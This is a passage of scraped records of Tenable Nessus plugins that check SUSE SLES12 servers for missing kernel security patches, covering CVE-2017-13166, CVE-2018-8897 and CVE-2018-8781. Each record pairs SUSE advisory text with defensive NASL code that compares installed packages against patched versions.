3.12.74-60_64_48 fixes several issues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in drivers/gpu/drm/udl/udl_fb.c had an integer-overflow vulnerability allowing local users with access to the udldrmfb driver to obtain full read and write permissions on kernel physical pages, resulting in a code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1514-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110349", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1514-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1514-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110349);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1514-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_48 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181514-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e303394e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1055=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1055=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_48-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_48-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_48-default-10-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_48-xen-10-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:16", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.74-60_64_60 fixes several issues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in drivers/gpu/drm/udl/udl_fb.c had an integer-overflow vulnerability allowing local users with access to the udldrmfb driver to obtain full read and write permissions on kernel physical pages, resulting in a code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1546-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110377", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1546-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1546-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110377);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1546-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_60 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181546-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a690614c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1052=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1052=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_60-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_60-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_60-default-8-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_60-xen-8-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:14", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.61-52_111 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in drivers/gpu/drm/udl/udl_fb.c had an integer-overflow vulnerability allowing local users with access to the udldrmfb driver to obtain full read and write permissions on kernel physical pages, resulting in a code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1533-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110366", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1533-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1533-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110366);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1533-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_111 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181533-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d752502a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1036=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_111-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_111-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_111-default-5-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_111-xen-5-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:15", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.61-52_86 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability in the kernel v4l2 video driver was fixed.\n 